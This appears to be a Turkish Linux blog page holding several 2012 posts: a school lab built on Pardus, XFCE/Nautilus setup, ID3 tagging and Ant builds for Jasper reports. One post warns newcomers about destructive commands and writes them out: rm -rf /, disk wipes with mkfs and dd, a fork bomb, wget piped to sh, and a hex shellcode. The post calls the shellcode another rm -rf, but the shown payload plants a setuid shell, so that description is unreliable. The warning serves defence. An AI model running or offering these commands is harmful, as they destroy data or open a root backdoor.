Toplu id3 tagı düzenlemek

Her zaman ki gibi amerikalıların bu duruma ne dediği ile başlayalım :D " bash id3 tag editing" . Android bi telefonum var şimdi marka söyleyip ele güne reklam etmeyelim. müzik falan da çalıyor :P güzel telefon ancak klasör halinde attığım müzikleri sıra ile çalma gibi bir huyu yok. Bir sonraki parça dediğimde albümde sıradaki parçayı çalıyor. Can sıkıcı. Nasıl çözerim diye düşünürken eğer indirdiğim bağımsız parçaları gruplarken albüm isimlerini aynı yaparsam albüm tanıma özelliği olan telefonumda sıkıntısız dinleyebileceğimi düşündüm.

Ancak o kadar mp3 'ün toplu bir  şekilde id3 taglarını nasıl düzenleyecektim? :S önce id3ed isimli ufak konsol yazılımını denedim tek tek yapıyordu uğraştıracaktı.


Bi an şimşekler çaktı yılların müzik oynatıcı Amarok aklıma geldi seçtiğim müziklerin biri üzerinde sağ tıklayıp id3 tagını düzenlemem için açılan pencereyi doldurmam yeterli idi. Gerçekten acısız oldu.

19 Şubat 2012

Posted In: linux, pardus, Program Tanıtımı

Artık Bilişim Teknolojileri Sınıfımız Daha Özgür

2011 yılının sonlarına doğru başladığım çalışmadan Özgür Bilişim Teknolojileri Sınıfı başlıklı yazımda bahsetmiştim ve o günden bu yana 2,5 aydır bilişim teknolojileri sınıfımız daha özgür.

BT sınıfımızda öğretmen ve öğrenci bilgisayarlarının tümüne Pardus Kurumsal 2 versiyonu kullanıyoruz. 2,5 ay önce ders zili Pardus için çaldı ve hala çalıyor 🙂

İlköğretim düzeyindeki öğrencilerim beni şaşırtacak derece hızlı alıştılar. Bu kısa sürede birkaç öğrenci benden Pardus DVD’si istedi, kopyalayıp verdim. Birkaç öğrenciye evde de Libre Office kullanmak istediğini söyledi, kopyalayıp verdim. Bazıları da İnternetten kendilerinin indirdiğini söyledi.

Bu süre zarfında bazı öğrencilerin bana “öğretmenin bu Pardus daha güzelmiş”, “Öğretmenim evdeki bilgisayarıma ben de Pardus kurabilir miyim?”, “Öğretmenin USB bellek getirsem bana Libre Office çekebilir misiniz?” vb. sorularla gelmeleri inanın beni çok mutlu etti.

Özgür Bilişim Teknolojileri Sınıfını oluştururken

Öğretmen Bilgisayarına daha önce kurulumlarını anlattığım;

Pardus Kurumsal 2 – Squid Kurulumu (Web Proxy)(Vekil Sunucu)
Pardus Kurumsal 2 – NTP Zaman Sunucusu (NTP Server) Kurulumu
Sunucu yazılımlarını kurdum.

Öğrenci bilgisayarlarını ise gene daha önce yazdığım şekilde
Pardus Kurumsal 2 de Otomatik kullanıcı girişi
Pardus Kurumsal 2 – Sistem Koruma (Sistem Dondurma)
yapılandırarak sorunsuz bir biçimde çalışmalarını sağladım.

ve bu süre zarfında sayısız elektrik kesintisi, reset ve kapanmalara rağmen hala sorunsuz bir biçimde çalışıyorlar.

Daha önce Pardus Kurumsal – Bilişim Teknolojileri Sınıf Yönetimi (italc) yazımda kurulumunu anlattığım Açık kaynak kodlu bilgisayar sınıfı yönetim yazılımı olan italc ile BT sınıfı yönetimini sorunsuz bir biçimde yapıyorum.

Pardus üzerinde çalıştırmayı başaramadığım için bir öğrenci bilgisayarına aynı zamanda Ubuntu kurdum. Ubuntu üzerine şu yazıda ingilizce anlatımı bulunan “School Computer Disk Imaging” şekilde Clonezilla Server yazılımı ile 20 bilgisayarın tamamının kurulumunu disk imajı kopyalama tekniği ile neredeyse 20 dakikada tamamladım.

Tabi her şey bu kadar güzel gitmedi. Hevesle beklediğim yeni sürüm gelmediği gibi bu sürede Pardus ilgili ortalıkta neler oldu neler… forumlar, mail grupları karıştı. Bu konulara  girmek istemiyorum. Ama başta geliştiriciler olmak üzere Pardus’a başından beri destek vermiş, emeği geçen herkese teşekkür ediyorum. Fatih Projesinin de durumu ortada… Herkesin bildiği konular. Bu konulara da girmek istemiyorum. Daha önce bir arkadaşın yorumuna yazdığım cevabı burada tekrar yinelemek istiyorum.

Yorum:Pardus projesindeki “belirsizlik” lere gelince; evet ne olacağı belirsiz gibi gözüküyor, günlerdir doğru düzgün bir açıklama da yok. Pardus Kurumsal 2 ile okulda ilk kez öğrenciler ile eğitime başladığım bugünlerde bu “belirsizlik”ler canımı sıkmıyor değil. Kaldı ki Kurumsal 2.1 alfa sürümünü takvime göre 16 aralıkta yayınlamayan ve hiç bir açıklama yapılmıyor olması Kurumsal sürümle de yola çok iyi devam edilemeyeceğini düşündürüyor insana. Ama benim hala umudum var. Bir proje biter başkası başlar, oradan çatallanır başka projeler doğar. Özgür yazılım dünyasında bunun örnekleri çokça görülmektedir.
Bu proje özgür bilişim teknolojileri sınıfı projesi ben bugün Pardus ile çabalıyorum. Yarın hangi dağıtım olur bilemem. Farklı dağıtımlar veya Linux kullanılıyor olması önemli değil, önemli olan bilişim teknolojileri sınıflarına bir fark getirebilmek. Bilişim teknoloji öğretmenlerine ve onların sayesinde öğrencilerin düşüncelerinde fark yaratmak.

Umarım bu farkı yaşayabiliriz…

 

Açıkçası bugün benim bazı alışkanlıklarım değişti. Belki ileride Pardus’la yola devam edemeyeceğiz. Ama artık bu gerçekten önemli değil çünkü ben bir bilgisayarda Ubuntu kullanıyorum, başka bir deneme bilgisayarına Linuxmint kurup deniyorum. Kütüphanemiz için eski bilgisayarlardan oluşan bir İnternet kullanım alanı yapacağız.Burada kullanmak üzere eski bilgisayarlar için sadece İnternet kullanımı amaçlı yapılmış dağıtımları inceliyorum.Yarın başka özgür bir sistemle yolumuza devam edebiliriz…

Son olarak söylemek istediğim istedikten ve çabaladıktan sonra özgür bilişim teknolojileri sınıflarına, özgür bilgisayarlara, özgür teknolojilere ve en önemlisi özgür düşünen bireylere ulaşabiliriz…

14 Şubat 2012

Posted In: Clonezilla server, Genel, linux, Özgür Bilgisayar Sınıfı, Özgür Bilişim Teknolojileri Sınıfı, pardus, Pardus Bilgisayar Sınıfı, Pardus Bilişim Teknolojileri Sınıfı, Sunucu Sistemleri, ubuntu

RHEL Yaşam Döngüsü Değişikliği

RHEL 5 ve RHEL 6 için öngülen 7 yıllık süre 10 yıla çıkartıldı. 2007 yılında çıkan RHEL 5 ve 2010 yılında çıkan RHEL 6 kullanıcıları 3 yıl daha fazla destek alacaklar. Firma süreyi arttırarak yatırımcıların firmaya olan güvenini arttırarak Red Hat'e geçişlerin hızlanmasını amaçlıyor.

Basın duyurusu:
http://www.redhat.com/about/news/press-archive/2012/1/red-hat-enterprise-linux-stability-drives-demand-for-more-flexibility-in-long-term-operating-system-deployments

RHEL Life Cycle:
https://access.redhat.com/support/policy/updates/errata/

9 Şubat 2012

Posted In: linux, red hat

XFCE 4.8 üzerine Nautilus kurulumu

XFCE'nin varsayılan dosya yöneticisi Thumar'ı yavan bulduğumdan bir önceki yazımda bahsetmiştim ve dosya yöneticisi olarak Nautilus kurmaya çalıştım  O süreçten biraz bahsetmek istiyorum.


Öncelikle herkesin en başta yapacağı gibi depolardan Nautilus'u indirdim. Ama çalıştırdığım zaman sorun olmamasına rağmen bütün masaüstü simgeleri kayboldu ve arka plan komple mavi oldu. (Mavi ekran hoş çağrışımlar yapmadı tabii)


İnternette biraz dolandığımda bu sorunun Nautilus'un GNOME üzerinde çalışmadığını fark etmesi ve bazı masaüstü ayarlarına müdahale etmeye çalışması yatıyormuş. GNU/Linux üzerinde masaüstü olarak adlandırdığımız alanın dosya yöneticilerini tarafından sağlandığını öğrenmek kısa süreli bir şok yaşattı.


Bu durumda yapılacak olan şey varsayılan tarayıcı olarak Nautilus kullanıp masaüstünün Thunar tarafından yönetilmesini sağlamaktı. Bunun için Nautilus yapılandırma dosyalarında bazı değişiklikler yapmak gerekiyor. gconftool-2 -s -t bool /apps/nautilus/preferences/show_desktop false &

gconftool-2 -s -t bool /apps/nautilus/preferences/draw_background false &

dconf write /org/gnome/desktop/background/show-desktop-icons false 

Bu değişikleri yapmak yerine Nautilus'u  --no-desktop parametresiyle de çalıştırabilirsiniz ama eklentileri falan olumsuz etkiler mi bilmediğimden öyle bit yola girdim.  Bu değişikler yapıldıktan sonra Nautilus'u güzel güzel kullamabilmeye başlıyoruz ama masaüstü simgeleri Thunar tarafından yönetildiği için çift tıkladığımızda Thunar ile açılıyor. Bu adreste durumu değiştiremeyeceğimizi söylemiş ama Thunar'ın sağ tık menüsüne Open in Nautilus tadında bir komut eklemiş. Onun komutu da bu

gconftool-2 -s -t bool /apps/nautilus/preferences/show_desktop false &mv .config/Thunar/uca.xml .config/Thunar/uca.xml.bak ; sed 's/<\/actions>$/nautilus<\/icon>Open in Nautilus<\/name>nautilus %F<\/command><\/description>*<\/patterns><\/action><\/actions>/' .config/Thunar/uca.xml.bak > .config/Thunar/uca.xml

Aslında bu işlemi yapmadan masaüstü simgelerini de kapatabiliriz. Ama her ne kadar aygıtların simge olarak masaüstünde durmasından hoşlanmasam da (KDE'nin aygıtları panel notifikasyonu olarak gösterme çözümünü oldukça beğeniyorum) masaüstünde dosya işlemleri yapamamak hoşuma gitmediği için bunu tercih ettim. 

Bu işlemleri uyguladıktan sonra dosya yöneticimiz Nautilus'un keyfini çıkarabiliriz.

Yukarıda adresini verdiğim de başka kullandığım başka bir kaynakta bu onu da bildirmek istedim. http://ubuntuforums.org/showthread.php?t=1768245 

8 Şubat 2012

Posted In: Gezegen, gnu/linux

XFCE ve Xubuntu Üzerine

Tübitak 1 senedir kullanmakta olduğum Pardus 2011 serisini bitirince bende yeni bir dağıtım arayışına girdim. Şunu fark ettim ki masaüstü yöneticisi seçimi dağıtım seçimini oldukça etkiliyor. Önce masaüstü yöneticisini seçmek istedim. KDE'yi ve uygulamalarını aslında oldukça seviyorum ama farklı bir şey denemek istedim. Unity ve GNOME 3.x serisi pek beğenilmediğinden tercihimi XFCE'den yana kullandım. Dağıtım tercihimi de Xubuntu 11.10'dan yana kullandım. Tecrübelerimden biraz bahsetmek istiyorum.

Kurulumu bir USB bellek üzerinden yaptım. Kurulum aracının görüntülenmesinde bazı sorunlar olsa da kurulum hızına hayran kaldım. 5-10 dk arası bir zaman aldı. Masaüstü ilk açıldığında GNOME 2.x serisine oldukça benzediğini fark ettim ve bu durum hıoşuma gitti. Uygulama tercihlerinin bazılarını beğensem de çoğunu pek beğenmedim. Örneğin e-posta ve IM yazılımları benim favorilerim olan Thunderbird ve Pidgin ile gelen bir dağıtıma ilk defa rastladığım için memnunum. Onun dışında medya oynatıcısı olarak hiç bir dağıtımın VLC ile gelmediğini VLC aşığı bir insan olarak çok merak ediyorum.  Düzeltme  VLC'nin dağıtımlarla gelmemesinin sebebiyle ilgili "VLC'nin içindeki bazı yazılımların (DVD CSS şifreleme kırması ve libavcodec52) patent veya kanuni problemleri olduğundan Debian ve downstreamleri paketleri direk olarak koymuyor." açıklamasını yapan ortunk'ya teşekkür ediyorum.

Öntanımlı görüntü yazılımı ristretto bence berbattı ve diğer yüklü gösterici gThumb yeterli gelse de arayüzünü pek beğenmedim.  Eski dostum gwenview'in  bütün kde-base'i ile beraber gelmesi (KDE nin en sevmediğim yönü de budur herhalde şerefsizlerin şahane uygulamaları var ama başka ortamlara kurmak için 50 MB kadar kütüphane gerekiyor) de hoşuma gitmeyince depodan gPicView adında boyutu KB lar ile ölçüler bir yazılım buldum arayüzü biraz Windows'un resim göstericisine benzese de kendisinden memnun kaldım  KDE'de olmazsa olmazlarımdan Yakuake'nin alternatifi Guake yi bazı eksiklikleri olsa da beğendim. Büyük bir fontla gelmesi ciddi göz bozukluğu yaşayan şahsım için oldukça makbule geçti. Varsayılan metin düzenleyicisi leafpad'i biraz notepad'e benzetmedim değil (leafpad geliştiricileri bunu hakaret olarak kabul ederse kaldırabilirim tabii ki :D ) fıstık gibi gedit varken niye kullanmışlar merak ettim  Beğenmedim diyemesem de Dolphin ve Nautilus tan sonra Thunar pek bir yavan geldi. Alıştığım özelliklerin bir çoğuna sahip olmadığından da rahatsız oldum. Her ne kadar tamamen değiştiremesem de XFCE üzerine Nautilus kurmayı becerdim. (Nasıl yaptığımı başka bir yazıyla anlatabilirim) Görev yöneticisi de oldukça yavandı ve GNOME un Sistem Monitörüyle kıyas bile kabul etmezdi.

Benim bir GNU/Linux dağıtımında oldukça önem verdiğim uyuma ve uykudan uyanma konusunda sorun yaşamaması çok hoşuma gitti.(Bu durum Ubuntu 10.04 LTS de çok canımı sıkıyordu) Sonunda şunu anladım ki XFCE sadeliğe oldukça önem veren bir DE ama ben bir kullanıcı olarak işlevselliğe de oldukça önem verdiğimden beklediğimi pek bulamıyorum. Sonuçta size baya söylenmişim gibi gözükse de ben üzerindeki uygulamaları değiştirerek GNOME 2.x niyetine kendisiyle mutlu olabileceğimi düşünüyorum.

8 Şubat 2012

Posted In: Gezegen, gnu/linux, Özgür yazılım

Tehlikeli Linux Komutları

Geçenlerde Zeki Bildirici'nin Google+'da paylaştığı orjinalini bu adreste bulabileceğiniz Mitesh Shah tarafından yazılmış bir girdiye rastladım. Hoşuma gitti ve sosyal medya akışında kaybolmaması için bloguma aktarmak istedim. Aktarırken de bir katkım olsun diye tercüme edesim geldi. Fazla gevezelik etmeden sizi yazıyla baş başa bırakayım. 

Eğer Linux'ta yeniyseniz, İnternette forumlarda veya IRC 'de dosyalarınıza veya işletim sistemine zarar
verecek komutları çalıştırmanız için sizi kandıracak bazı geri zekalı insanlara denk gelme ihtimaliniz vardır. Aşağıda bu tehlikeli senaryodan kaçınmak için uzak durmanız gereken bazı tehlikeli Linux komutlarından bahsedeceğim.

1. Komut 

rm -rf /

Bu komut herhangi bir uyarı mesajı vermeden kök dizinin içindeki bütün dosyaları silecektir.rm normalde konsol üzerinde dosya silmek için kullandığımız bir komuttur. Ve normalde silmek istiyor musunuz şeklinde bir uyarı verir ama -f (force) parametresi bu uyarıyı ezer ve doğrudan silme işlemini uygular. -r (recursively) parametresi de bütün alt klasörleriyle birlikte sil anlamına gelir. 


2. Komut

char esp[] _attribute_ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


Bu komut rm -rf / yazmanın başka bir yoludur. Hex formatında olduğu için tecrübeli Linux kullanıcılarını bile yanıltabilir.

3. Komut

mkfs.ext3 /dev/sda
Bu komut sabit diski biçimlendirir yani bütün dosyalarınızı kaybedersiniz. mkfs.ext3 verilen disk veya disk bölümünü ext3 formatında biçimlendir anlamına gelir. /dev/sda ise ana/birincil sabit disk anlamına gelir. Örneğin /dev/sda2 ana sabit diskin sadece bir bölümünü tarif eder.

4. Komut

:(){:|:&};:

Linux camiasında fork bomb olarak da adlandırılan bir kabuk betiğidir. Sonsuz adet process başlatarak işletim sistemini kilitlemeyi amaçlar ve genelde veri kaybı ile sonuçlanır.

5. Komut
herhangi_bir_komut > /dev/sda

Bu komut ham verinin bir cihaza yazılmasına sebep olur. Genellikle dosya sisteminin üzerine yazacağı için veri kaybıyla sonuçlanır.

6. Komut

wget http://some_untrusted_source O | sh


Güvenilmeyen kaynaklardan indirme yapmayın ve bu kaynaklardan gelen kodları çalıştırmayın. Bu kodu size veren kişi kendi zararlı kodunu çalıştırmanızı istiyor olabilir.

7. Komut

mv ~/* /dev/null
mv /home/evdizininiz/* /dev/null


Bu komut dosyalarınızı /dev/null adındaki farazi bir konuma taşır yani dosyalarınızı tamamen kaybedersiniz.

8.Komut

dd if=/dev/urandom of=/dev/sda


Bu komut diskinize veya disk bölümünüze rastgele bilgiler yazar. dd komutu günlük hayatta bir taşınabilir belleğe bir disk kalıbı (işletim sistemi kalıbı vs.) yazmak vs. işlerde kullanabilir.

9. Komut

chmod -R 777 /

Bu komut herhangi bir veriye erişim haklarını değiştirerek. Bilgisayar üzerindeki herkese okuma-yazma ve çalıştırma haklarını verir. 

10. Komut

chmod 000 -R /
chown nobody:nobody -R /

Bu komut herhangi bir veriye erişim haklarını değiştirerek onu root haricindeki herkes için erişilmez kılar.

7 Şubat 2012

Posted In: Gezegen, gnu/linux, Özgür yazılım

Jasper Raporlarını Ant ile Nasıl Derlerim?

Bir dizinde bulunan .jrxml uzantılı raporlarımızı ant ile derlemek için build.xml dosyasına aşşağıdaki betik yazılabilir.

<taskdef name=”jrc” classname=”net.sf.jasperreports.ant.JRAntCompileTask”>
<classpath refid=”build.classpath”/>
</taskdef>

<target name=”buildjasper”>
<mkdir dir=”./build/reports”/>
<jrc
srcdir=”${basedir}/jasper”
destdir=”${dist.dir}/reports”
tempdir=”${dist.dir}/temp”
keepjava=”true”
xmlvalidation=”true”>
<classpath refid=”build.classpath”/>
<include name=”**/*.jrxml”/>
</jrc>
</target>

Burada  taskdef  tag’i içine jasper raporlarının derlenmesi için gerekli olan java kütüphanesinin adı ve class path’i yazılır.

srcdir : Adından da anlaşılacağı gibi kaynak dizinimizdir. Yani .jrxml uzantılı raporlarımızın bulunduğu dizin.

destdir: Derlemeden sonra oluşacak .jasper uzantılı raporlarımızın gideceği dizin.

tempdir: Derlemeden sonra oluşacak diğer dosyaların kopyalanacağı dizin.

Daha sonradan build.xml ‘in olduğu dizinde bir konsol açıp “ant buildjasper” (*) komutunu yazarak raporlarınızı derleyebilirsiniz.

* buildjasper : ant betiğinde ki target name’i.


1 Şubat 2012

Posted In: Gezegen, java, linux

WP Twitter Auto Publish Powered By : XYZScripts.com